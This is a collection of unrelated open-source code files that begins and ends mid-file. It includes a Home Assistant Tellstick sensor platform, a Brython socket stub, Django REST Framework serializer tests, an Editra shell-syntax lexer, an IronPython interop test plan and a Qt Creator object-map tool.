vol.Optional(CONF_DATATYPE_MASK, default=DEFAULT_DATATYPE_MASK):
cv.positive_int,
vol.Optional(CONF_ONLY_NAMED, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_ID): cv.positive_int,
vol.Required(CONF_NAME): cv.string,
})])
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Tellstick sensors."""
from tellcore import telldus
import tellcore.constants as tellcore_constants
sensor_value_descriptions = {
tellcore_constants.TELLSTICK_TEMPERATURE:
DatatypeDescription('temperature', config.get(CONF_TEMPERATURE_SCALE)),
tellcore_constants.TELLSTICK_HUMIDITY:
DatatypeDescription('humidity', '%'),
tellcore_constants.TELLSTICK_RAINRATE:
DatatypeDescription('rain rate', ''),
tellcore_constants.TELLSTICK_RAINTOTAL:
DatatypeDescription('rain total', ''),
tellcore_constants.TELLSTICK_WINDDIRECTION:
DatatypeDescription('wind direction', ''),
tellcore_constants.TELLSTICK_WINDAVERAGE:
DatatypeDescription('wind average', ''),
tellcore_constants.TELLSTICK_WINDGUST:
DatatypeDescription('wind gust', '')
}
try:
tellcore_lib = telldus.TelldusCore()
except OSError:
_LOGGER.exception('Could not initialize Tellstick')
return
sensors = []
datatype_mask = config.get(CONF_DATATYPE_MASK)
if config[CONF_ONLY_NAMED]:
named_sensors = {
named_sensor[CONF_ID]: named_sensor[CONF_NAME]
for named_sensor in config[CONF_ONLY_NAMED]}
for tellcore_sensor in tellcore_lib.sensors():
if not config[CONF_ONLY_NAMED]:
sensor_name = str(tellcore_sensor.id)
else:
if tellcore_sensor.id not in named_sensors:
continue
sensor_name = named_sensors[tellcore_sensor.id]
for datatype in sensor_value_descriptions:
if datatype & datatype_mask and \
tellcore_sensor.has_value(datatype):
sensor_info = sensor_value_descriptions[datatype]
sensors.append(TellstickSensor(
sensor_name, tellcore_sensor,
datatype, sensor_info))
add_entities(sensors)
class TellstickSensor(Entity):
"""Representation of a Tellstick sensor."""
def __init__(self, name, tellcore_sensor, datatype, sensor_info):
"""Initialize the sensor."""
self._datatype = datatype
self._tellcore_sensor = tellcore_sensor
self._unit_of_measurement = sensor_info.unit or None
self._value = None
self._name = '{} {}'.format(name, sensor_info.name)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
def update(self):
"""Update tellstick sensor."""
self._value = self._tellcore_sensor.value(self._datatype).value
|
linjoahow/w17test_1
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/_socket.py
|
742
|
"""Implementation module for socket operations.
See the socket module for documentation."""
AF_APPLETALK = 16
AF_DECnet = 12
AF_INET = 2
AF_INET6 = 23
AF_IPX = 6
AF_IRDA = 26
AF_SNA = 11
AF_UNSPEC = 0
AI_ADDRCONFIG = 1024
AI_ALL = 256
AI_CANONNAME = 2
AI_NUMERICHOST = 4
AI_NUMERICSERV = 8
AI_PASSIVE = 1
AI_V4MAPPED = 2048
CAPI = '<capsule object "_socket.CAPI" at 0x00BC4F38>'
EAI_AGAIN = 11002
EAI_BADFLAGS = 10022
EAI_FAIL = 11003
EAI_FAMILY = 10047
EAI_MEMORY = 8
EAI_NODATA = 11001
EAI_NONAME = 11001
EAI_SERVICE = 10109
EAI_SOCKTYPE = 10044
INADDR_ALLHOSTS_GROUP = -536870911
INADDR_ANY = 0
INADDR_BROADCAST = -1
INADDR_LOOPBACK = 2130706433
INADDR_MAX_LOCAL_GROUP = -536870657
INADDR_NONE = -1
INADDR_UNSPEC_GROUP = -536870912
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IPPROTO_ICMP = 1
IPPROTO_IP = 0
IPPROTO_RAW = 255
IPPROTO_TCP = 6
IPPROTO_UDP = 17
IPV6_CHECKSUM = 26
IPV6_DONTFRAG = 14
IPV6_HOPLIMIT = 21
IPV6_HOPOPTS = 1
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_LOOP = 11
IPV6_PKTINFO = 19
IPV6_RECVRTHDR = 38
IPV6_RECVTCLASS = 40
IPV6_RTHDR = 32
IPV6_TCLASS = 39
IPV6_UNICAST_HOPS = 4
IPV6_V6ONLY = 27
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_HDRINCL = 2
IP_MULTICAST_IF = 9
IP_MULTICAST_LOOP = 11
IP_MULTICAST_TTL = 10
IP_OPTIONS = 1
IP_RECVDSTADDR = 25
IP_TOS = 3
IP_TTL = 4
MSG_BCAST = 1024
MSG_CTRUNC = 512
MSG_DONTROUTE = 4
MSG_MCAST = 2048
MSG_OOB = 1
MSG_PEEK = 2
MSG_TRUNC = 256
NI_DGRAM = 16
NI_MAXHOST = 1025
NI_MAXSERV = 32
NI_NAMEREQD = 4
NI_NOFQDN = 1
NI_NUMERICHOST = 2
NI_NUMERICSERV = 8
RCVALL_MAX = 3
RCVALL_OFF = 0
RCVALL_ON = 1
RCVALL_SOCKETLEVELONLY = 2
SHUT_RD = 0
SHUT_RDWR = 2
SHUT_WR = 1
SIO_KEEPALIVE_VALS = 2550136836
SIO_RCVALL = 2550136833
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
SOCK_STREAM = 1
SOL_IP = 0
SOL_SOCKET = 65535
SOL_TCP = 6
SOL_UDP = 17
SOMAXCONN = 2147483647
SO_ACCEPTCONN = 2
SO_BROADCAST = 32
SO_DEBUG = 1
SO_DONTROUTE = 16
SO_ERROR = 4103
SO_EXCLUSIVEADDRUSE = -5
SO_KEEPALIVE = 8
SO_LINGER = 128
SO_OOBINLINE = 256
SO_RCVBUF = 4098
SO_RCVLOWAT = 4100
SO_RCVTIMEO = 4102
SO_REUSEADDR = 4
SO_SNDBUF = 4097
SO_SNDLOWAT = 4099
SO_SNDTIMEO = 4101
SO_TYPE = 4104
SO_USELOOPBACK = 64
class SocketType:
pass
TCP_MAXSEG = 4
TCP_NODELAY = 1
__loader__ = '<_frozen_importlib.ExtensionFileLoader object at 0x00CA2D90>'
def dup(*args,**kw):
"""dup(integer) -> integer
Duplicate an integer socket file descriptor. This is like os.dup(), but for
sockets; on some platforms os.dup() won't work for socket file descriptors."""
pass
class error:
pass
class gaierror:
pass
def getaddrinfo(*args,**kw):
"""getaddrinfo(host, port [, family, socktype, proto, flags]) -> list of (family, socktype, proto, canonname, sockaddr)
Resolve host and port into addrinfo struct."""
pass
def getdefaulttimeout(*args,**kw):
"""getdefaulttimeout() -> timeout
Returns the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
def gethostbyaddr(*args,**kw):
"""gethostbyaddr(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostbyname(*args,**kw):
"""gethostbyname(host) -> address
Return the IP address (a string of the form '255.255.255.255') for a host."""
pass
def gethostbyname_ex(*args,**kw):
"""gethostbyname_ex(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostname(*args,**kw):
"""gethostname() -> string
Return the current host name."""
pass
def getnameinfo(*args,**kw):
"""getnameinfo(sockaddr, flags) --> (host, port)
Get host and port for a sockaddr."""
pass
def getprotobyname(*args,**kw):
"""getprotobyname(name) -> integer
Return the protocol number for the named protocol. (Rarely used.)"""
pass
def getservbyname(*args,**kw):
"""getservbyname(servicename[, protocolname]) -> integer
Return a port number from a service name and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
def getservbyport(*args,**kw):
"""getservbyport(port[, protocolname]) -> string
Return the service name from a port number and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
has_ipv6 = True
class herror:
pass
def htonl(*args,**kw):
"""htonl(integer) -> integer
Convert a 32-bit integer from host to network byte order."""
pass
def htons(*args,**kw):
"""htons(integer) -> integer
Convert a 16-bit integer from host to network byte order."""
pass
def inet_aton(*args,**kw):
"""inet_aton(string) -> bytes giving packed 32-bit IP representation
Convert an IP address in string format (123.45.67.89) to the 32-bit packed
binary format used in low-level network functions."""
pass
def inet_ntoa(*args,**kw):
"""inet_ntoa(packed_ip) -> ip_address_string
Convert an IP address from 32-bit packed binary format to string format"""
pass
def ntohl(*args,**kw):
"""ntohl(integer) -> integer
Convert a 32-bit integer from network to host byte order."""
pass
def ntohs(*args,**kw):
"""ntohs(integer) -> integer
Convert a 16-bit integer from network to host byte order."""
pass
def setdefaulttimeout(*args,**kw):
"""setdefaulttimeout(timeout)
Set the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
class socket:
def __init__(self,*args,**kw):
pass
def bind(self,*args,**kw):
pass
def close(self):
pass
class timeout:
pass
|
hnarayanan/django-rest-framework
|
refs/heads/master
|
tests/test_serializer.py
|
5
|
# coding: utf-8
from __future__ import unicode_literals
from .utils import MockObject
from rest_framework import serializers
from rest_framework.compat import unicode_repr
import pickle
import pytest
# Tests for core functionality.
# -----------------------------
class TestSerializer:
def setup(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
self.Serializer = ExampleSerializer
def test_valid_serializer(self):
serializer = self.Serializer(data={'char': 'abc', 'integer': 123})
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc', 'integer': 123}
assert serializer.errors == {}
def test_invalid_serializer(self):
serializer = self.Serializer(data={'char': 'abc'})
assert not serializer.is_valid()
assert serializer.validated_data == {}
assert serializer.errors == {'integer': ['This field is required.']}
def test_partial_validation(self):
serializer = self.Serializer(data={'char': 'abc'}, partial=True)
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc'}
assert serializer.errors == {}
def test_empty_serializer(self):
serializer = self.Serializer()
assert serializer.data == {'char': '', 'integer': None}
def test_missing_attribute_during_serialization(self):
class MissingAttributes:
pass
instance = MissingAttributes()
serializer = self.Serializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestValidateMethod:
def test_non_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError('Non field error')
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'non_field_errors': ['Non field error']}
def test_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError({'char': 'Field error'})
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'char': ['Field error']}
class TestBaseSerializer:
def setup(self):
class ExampleSerializer(serializers.BaseSerializer):
def to_representation(self, obj):
return {
'id': obj['id'],
'email': obj['name'] + '@' + obj['domain']
}
def to_internal_value(self, data):
name, domain = str(data['email']).split('@')
return {
'id': int(data['id']),
'name': name,
'domain': domain,
}
self.Serializer = ExampleSerializer
def test_serialize_instance(self):
instance = {'id': 1, 'name': 'tom', 'domain': 'example.com'}
serializer = self.Serializer(instance)
assert serializer.data == {'id': 1, 'email': 'tom@example.com'}
def test_serialize_list(self):
instances = [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'},
]
serializer = self.Serializer(instances, many=True)
assert serializer.data == [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'}
]
def test_validate_data(self):
data = {'id': 1, 'email': 'tom@example.com'}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {
'id': 1,
'name': 'tom',
'domain': 'example.com'
}
def test_validate_list(self):
data = [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'},
]
serializer = self.Serializer(data=data, many=True)
assert serializer.is_valid()
assert serializer.validated_data == [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'}
]
class TestStarredSource:
"""
Tests for `source='*'` argument, which is used for nested representations.
For example:
nested_field = NestedField(source='*')
"""
data = {
'nested1': {'a': 1, 'b': 2},
'nested2': {'c': 3, 'd': 4}
}
def setup(self):
class NestedSerializer1(serializers.Serializer):
a = serializers.IntegerField()
b = serializers.IntegerField()
class NestedSerializer2(serializers.Serializer):
c = serializers.IntegerField()
d = serializers.IntegerField()
class TestSerializer(serializers.Serializer):
nested1 = NestedSerializer1(source='*')
nested2 = NestedSerializer2(source='*')
self.Serializer = TestSerializer
def test_nested_validate(self):
"""
A nested representation is validated into a flat internal object.
"""
serializer = self.Serializer(data=self.data)
assert serializer.is_valid()
assert serializer.validated_data == {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
def test_nested_serialize(self):
"""
An object can be serialized into a nested representation.
"""
instance = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
serializer = self.Serializer(instance)
assert serializer.data == self.data
class TestIncorrectlyConfigured:
def test_incorrect_field_name(self):
class ExampleSerializer(serializers.Serializer):
incorrect_name = serializers.IntegerField()
class ExampleObject:
def __init__(self):
self.correct_name = 123
instance = ExampleObject()
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError) as exc_info:
serializer.data
msg = str(exc_info.value)
assert msg.startswith(
"Got AttributeError when attempting to get a value for field `incorrect_name` on serializer `ExampleSerializer`.\n"
"The serializer field might be named incorrectly and not match any attribute or key on the `ExampleObject` instance.\n"
"Original exception text was:"
)
class TestUnicodeRepr:
def test_unicode_repr(self):
class ExampleSerializer(serializers.Serializer):
example = serializers.CharField()
class ExampleObject:
def __init__(self):
self.example = '한국'
def __repr__(self):
return unicode_repr(self.example)
instance = ExampleObject()
serializer = ExampleSerializer(instance)
repr(serializer) # Should not error.
class TestNotRequiredOutput:
def test_not_required_output_for_dict(self):
"""
'required=False' should allow a dictionary key to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
assert serializer.data == {'included': 'abc'}
def test_not_required_output_for_object(self):
"""
'required=False' should allow an object attribute to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
def create(self, validated_data):
return MockObject(**validated_data)
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
serializer.save()
assert serializer.data == {'included': 'abc'}
def test_default_required_output_for_dict(self):
"""
'default="something"' should require dictionary key.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
serializer = ExampleSerializer({'included': 'abc'})
with pytest.raises(KeyError):
serializer.data
def test_default_required_output_for_object(self):
"""
'default="something"' should require object attribute.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
instance = MockObject(included='abc')
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestCacheSerializerData:
def test_cache_serializer_data(self):
"""
Caching serializer data with pickle will drop the serializer info,
but does preserve the data itself.
"""
class ExampleSerializer(serializers.Serializer):
field1 = serializers.CharField()
field2 = serializers.CharField()
serializer = ExampleSerializer({'field1': 'a', 'field2': 'b'})
pickled = pickle.dumps(serializer.data)
data = pickle.loads(pickled)
assert data == {'field1': 'a', 'field2': 'b'}
|
vadimtk/chrome4sdp
|
refs/heads/master
|
chrome/common/extensions/docs/server2/caching_rietveld_patcher_test.py
|
121
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from caching_rietveld_patcher import (CachingRietveldPatcher,
_VERSION_CACHE_MAXAGE)
from datetime import datetime
from object_store_creator import ObjectStoreCreator
from test_patcher import TestPatcher
_TEST_PATCH_VERSION = '1'
_TEST_PATCH_FILES = (['add.txt'], ['del.txt'], ['modify.txt'])
_TEST_PATCH_DATA = {
'add.txt': 'add',
'modify.txt': 'modify',
}
class FakeDateTime(object):
def __init__(self, time=datetime.now()):
self.time = time
def now(self):
return self.time
class CachingRietveldPatcherTest(unittest.TestCase):
def setUp(self):
self._datetime = FakeDateTime()
self._test_patcher = TestPatcher(_TEST_PATCH_VERSION,
_TEST_PATCH_FILES,
_TEST_PATCH_DATA)
self._patcher = CachingRietveldPatcher(
self._test_patcher,
ObjectStoreCreator(start_empty=False),
self._datetime)
def testGetVersion(self):
# Invalidate cache.
self._datetime.time += _VERSION_CACHE_MAXAGE
# Fill cache.
self._patcher.GetVersion()
count = self._test_patcher.get_version_count
# Should read from cache.
self._patcher.GetVersion()
self.assertEqual(count, self._test_patcher.get_version_count)
# Invalidate cache.
self._datetime.time += _VERSION_CACHE_MAXAGE
# Should fetch version.
self._patcher.GetVersion()
self.assertEqual(count + 1, self._test_patcher.get_version_count)
def testGetPatchedFiles(self):
# Fill cache.
self._patcher.GetPatchedFiles()
count = self._test_patcher.get_patched_files_count
# Should read from cache.
self._patcher.GetPatchedFiles()
self.assertEqual(count, self._test_patcher.get_patched_files_count)
def testApply(self):
# Fill cache.
self._patcher.Apply(['add.txt'], None).Get()
count = self._test_patcher.apply_count
# Should read from cache even though it's reading another file.
self._patcher.Apply(['modify.txt'], None).Get()
self.assertEqual(count, self._test_patcher.apply_count)
if __name__ == '__main__':
unittest.main()
|
ibinti/intellij-community
|
refs/heads/master
|
python/testData/inspections/ChainedComparison1_after.py
|
83
|
if e < a <= b < c <= d:
print "q"
|
beiko-lab/gengis
|
refs/heads/master
|
bin/Lib/site-packages/wx-2.8-msw-unicode/wx/tools/Editra/src/syntax/_sh.py
|
3
|
###############################################################################
# Name: sh.py #
# Purpose: Define Bourne/Bash/Csh/Korn Shell syntaxes for highlighting and #
# other features. #
# Author: Cody Precord <cprecord@editra.org> #
# Copyright: (c) 2007 Cody Precord <staff@editra.org> #
# License: wxWindows License #
###############################################################################
"""
FILE: sh.py
AUTHOR: Cody Precord
@summary: Lexer configuration file for Bourne, Bash, Kornshell and
C-Shell scripts.
"""
__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: _sh.py 63834 2010-04-03 06:04:33Z CJP $"
__revision__ = "$Revision: 63834 $"
#-----------------------------------------------------------------------------#
# Imports
import wx.stc as stc
# Local Imports
import synglob
import syndata
#-----------------------------------------------------------------------------#
# Bourne Shell Keywords (bash and kornshell have these too)
COMM_KEYWORDS = ("break eval newgrp return ulimit cd exec pwd shift umask "
"chdir exit read test wait continue kill readonly trap "
"contained elif else then case esac do done for in if fi "
"until while set export unset")
# Bash/Kornshell extensions (in bash/kornshell but not bourne)
EXT_KEYWORDS = ("function alias fg integer printf times autoload functions "
"jobs r true bg getopts let stop type false hash nohup suspend "
"unalias fc history print time whence typeset while select")
# Bash Only Keywords
BSH_KEYWORDS = ("bind disown local popd shopt builtin enable logout pushd "
"source dirs help declare")
# Bash Shell Commands (statements)
BCMD_KEYWORDS = ("chmod chown chroot clear du egrep expr fgrep find gnufind "
"gnugrep grep install less ls mkdir mv reload restart rm "
"rmdir rpm sed su sleep start status sort strip tail touch "
"complete stop echo")
# Korn Shell Only Keywords
KSH_KEYWORDS = "login newgrp"
# Korn Shell Commands (statements)
KCMD_KEYWORDS = ("cat chmod chown chroot clear cp du egrep expr fgrep find "
"grep install killall less ls mkdir mv nice printenv rm rmdir "
"sed sort strip stty su tail touch tput")
# C-Shell Keywords
CSH_KEYWORDS = ("alias cd chdir continue dirs echo break breaksw foreach end "
"eval exec exit glob goto case default history kill login "
"logout nice nohup else endif onintr popd pushd rehash repeat "
"endsw setenv shift source time umask switch unalias unhash "
"unsetenv wait")
#---- Syntax Style Specs ----#
SYNTAX_ITEMS = [ (stc.STC_SH_DEFAULT, 'default_style'),
(stc.STC_SH_BACKTICKS, 'scalar_style'),
(stc.STC_SH_CHARACTER, 'char_style'),
(stc.STC_SH_COMMENTLINE, 'comment_style'),
(stc.STC_SH_ERROR, 'error_style'),
(stc.STC_SH_HERE_DELIM, 'here_style'),
(stc.STC_SH_HERE_Q, 'here_style'),
(stc.STC_SH_IDENTIFIER, 'default_style'),
(stc.STC_SH_NUMBER, 'number_style'),
(stc.STC_SH_OPERATOR, 'operator_style'),
(stc.STC_SH_PARAM, 'scalar_style'),
(stc.STC_SH_SCALAR, 'scalar_style'),
(stc.STC_SH_STRING, 'string_style'),
(stc.STC_SH_WORD, 'keyword_style') ]
#---- Extra Properties ----#
FOLD = ("fold", "1")
FLD_COMMENT = ("fold.comment", "1")
FLD_COMPACT = ("fold.compact", "0")
#------------------------------------------------------------------------------#
class SyntaxData(syndata.SyntaxDataBase):
"""SyntaxData object for various shell scripting languages"""
def __init__(self, langid):
syndata.SyntaxDataBase.__init__(self, langid)
# Setup
self.SetLexer(stc.STC_LEX_BASH)
def GetKeywords(self):
"""Returns Specified Keywords List """
keywords = list()
keyw_str = [COMM_KEYWORDS]
if self.LangId == synglob.ID_LANG_CSH:
keyw_str.append(CSH_KEYWORDS)
else:
if self.LangId != synglob.ID_LANG_BOURNE: # TODO ??
keyw_str.append(EXT_KEYWORDS)
if self.LangId == synglob.ID_LANG_BASH:
keyw_str.append(BSH_KEYWORDS)
keyw_str.append(BCMD_KEYWORDS)
elif self.LangId == synglob.ID_LANG_KSH:
keyw_str.append(KSH_KEYWORDS)
keyw_str.append(KCMD_KEYWORDS)
else:
pass
keywords.append((0, " ".join(keyw_str)))
return keywords
def GetSyntaxSpec(self):
"""Syntax Specifications """
return SYNTAX_ITEMS
def GetProperties(self):
"""Returns a list of Extra Properties to set """
return [FOLD, FLD_COMMENT, FLD_COMPACT]
def GetCommentPattern(self):
"""Returns a list of characters used to comment a block of code """
return [u'#']
|
paweljasinski/ironpython3
|
refs/heads/master
|
Tests/interop/net/__init__.py
|
3
|
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
'''
-------------------------------------------------------------------------------
OVERVIEW
The goal of this test package is to provide a framework to exhaustively
verify IronPython's .NET interop capabilities. From a high-level, this means
we will be checking that:
- IronPython can utilize objects and types that have been implemented in some
other CLR-supported language. The goal here is to test all language features
of IL
- other CLR-supported languages can utilize IronPython objects and types via
the DLR hosting APIs and the new 'dynamic' keyword in C-sharp. Please note
that the goal of this testing is to find bugs in IronPython's IDynamicObject
implementation(s); not other CLR-supported languages' utilization of IDynamic
objects. A test plan specifically for this scenario has been created by the
DLR - see the "Testing Cross Language Operations on the DLR" document.
While there are other key testing aspects, at the highest level utilization of
.NET types from IronPython can be broken up into three key areas:
- getting .NET types
- creating instances of .NET types and performing operations on them
- subclassing/implementing .NET classes/interfaces from Python
EDITORS NOTE
Throughout this document you will find references to documentation in
other packages similar to "See documentation for interop.net.field". This simply
means that relative to this package (i.e., interop.net), you should follow
the 'field (package)' link at the bottom of this page.
------------------------------------------------------------------------------
GETTING THE .NET TYPE
KEY POINTS
* Can you get a type and how?
* What should happen when a naming conflict occurs?
- Merge or simply replace
- Possible conflicts:
* .NET namespace
* Type name
* Generics
* IronPython module
* When is the type is "visible"? When should it be "invisible"?
INTERESTING TYPES
See documentation for interop.net.type
-------------------------------------------------------------------------------
UTILIZATION OF .NET OBJECTS
TYPES
See documentation for interop.net.type
METHODS
See documentation for interop.net.method
FIELDS
See documentation for interop.net.field
PROPERTIES/INDEXERS
See documentation for interop.net.property
EVENTS/DELEGATES
See documentation for interop.net.event
-------------------------------------------------------------------------------
DERIVING FROM .NET TYPES
See documentation for interop.net.derivation.
-------------------------------------------------------------------------------
PYTHON CHARACTERISTICS OF .NET OBJECTS
* standard attributes (i.e., __init__, __doc__, etc)
* help and documentation strings
* dir(xyz) vs. getattr(xyz, 'abc') vs vs xyz.abc - all three should have
equivalent results
* setattr(xyz, 'abc', foo) vs xyz.abc = foo - should have equivalent results
* look at interop.com.dlrcomlib.pytraits for more ideas
-------------------------------------------------------------------------------
PERFORMANCE
To be revisited.
* simple method invocations
* importing from .NET namespaces
* loading assemblies
-------------------------------------------------------------------------------
STRESS
* run .NET interop tests with gcstress environment variables set
* run .NET interop tests with Managed Debugging Assistants turned on
* run .NET interop tests with IronPython/DLR binaries installed into the
global assembly cache
* check for memory leaks
* huge number of method parameters on a .NET method
-------------------------------------------------------------------------------
LOCALIZATION/GLOBALIZATION
To be revisited.
* tests should be run on a non-ENU operating system
-------------------------------------------------------------------------------
DEBUGGING EXPERIENCE
To be revisited. No special requirements?
-------------------------------------------------------------------------------
COMPATIBILITY
* does the latest version of IronPython pass the previous version's .NET
interop tests?
* is IronPython compatible with Python for .NET (http://pythonnet.sourceforge.net/)?
* is .NET interop the same under x86 and x64 CLR?
* is .NET interop the same under different operating systems?
* is .NET interop the same under interactive sessions versus Python modules?
-------------------------------------------------------------------------------
SECURITY
To be revisited. As IronPython is quite simply just another .NET program
running under the Common Language Runtime, CLR threat models should apply.
-------------------------------------------------------------------------------
CODE COVERAGE
Block coverage of the .NET binder should be maintained at 80% or higher. As of
May 2009, the .NET binder resides in the IronPython.Runtime.Binding namespace
and we're sitting at 88.8% block coverage.
-------------------------------------------------------------------------------
ACCESSIBILITY
To be revisited.
-------------------------------------------------------------------------------
MISC. INTERESTING CASES
* Are certain CLR Exceptions interchangable with Python builtin exceptions?
* How does IronPython treats the following types:
- IList, List, ArrayList
- Hashtable, Dictionary`2, IDictionary
- IEnumerable, IEnumerator
- IComparable
* Operations on .NET namespaces
- the top level
- the nested level
- the bottom level
* Operations on nested classes
* Operations on the Assembly/AssemblyBuilder type and instances
Special DLR Types
* Extensible<T> - Python currently provides implementations for a bunch of
members on the Extensible type (for some types) but they shouldn't be
necessary. A raw Extensible<Xyz> should be have the same as an Xyz
-------------------------------------------------------------------------------
EXISTING TESTS WHICH NEED TO BE FOLDED INTO interop.net:
* test_cliclass.py
* test_delegate.py
* test_inheritance.py
* test_methodbinder1.py
* test_methodbinder2.py
* test_methoddispatch.py
* test_static.py
-------------------------------------------------------------------------------
AREAS TARGETED FOR MORE TEST COVERAGE (February 2009)
* .NET classes created using Visual Basic which use IL features that cannot
presently be hit from C#-based assemblies
- optional parameters
* running __builtin__ methods (isinstance, issubclass, len, help, dir, etc)
against .NET types/objects
* Python methods attached to .NET types:
- Dictionary().next()
- Indexing on System.Xml.XmlDocument().SelectSingleNode(...).Attributes["something"] (DefaultMemberAttribute)
- __cmp__, __lt__, __gt__, etc when one operand is a native Python type
* Event handlers implemented in Python:
- removing
- re-attaching
- memory leaks
- anything callable in Python should be capable of being used as a delegate
* Passing various Python objects to C# functions:
- new-style class dictionaries used as IDictionary
- setting integer properties with Python longs
- objects implementing special methods such __int__
- list objects should not be usable for IEnumerators
* Public vs protected methods with ref/out parameters
* .NET 4.0 features
-------------------------------------------------------------------------------
EXECUTION PLAN
To be revisited when more test resources become available.
'''
|
sailfish-sdk/sailfish-qtcreator
|
refs/heads/master
|
tests/system/tools/objectsToTable.py
|
6
|
#!/usr/bin/env python
############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import os
import sys
from optparse import OptionParser
from toolfunctions import checkDirectory
from toolfunctions import getFileContent
def parseCommandLine():
global directory, tsv
parser = OptionParser("\n%prog [OPTIONS] [DIRECTORY]")
parser.add_option("-t", "--tab-separated", dest="tsv",
action="store_true", default=False,
help="write a tab-separated table")
(options, args) = parser.parse_args()
if len(args) == 0:
directory = os.path.abspath(".")
elif len(args) == 1:
directory = os.path.abspath(args[0])
else:
print "\nERROR: Too many arguments\n"
parser.print_help()
sys.exit(1)
tsv = options.tsv
def readProperties(line):
def readOneProperty(rawProperties):
name, rawProperties = rawProperties.split("=", 1)
value, rawProperties = rawProperties.split("'", 2)[1:3]
# we want something human-readable so I think
# we can live with some imprecision
return name.strip(" ~?"), value, rawProperties
objectName, rawProperties = line.split("\t")
rawProperties = rawProperties.strip("{}")
properties = {}
while len(rawProperties) > 0:
name, value, rawProperties = readOneProperty(rawProperties)
properties[name] = value
return objectName, properties
def main():
global directory, tsv
objMap = checkDirectory(directory)
objects = dict(map(readProperties, getFileContent(objMap).splitlines()))
# Which properties have been used at least once?
eachObjectsProperties = [set(properties.keys()) for properties in objects.values()]
usedProperties = list(reduce(lambda x,y: x | y, eachObjectsProperties))
if tsv:
print "\t".join(["Squish internal name"] + usedProperties)
for name, properties in objects.items():
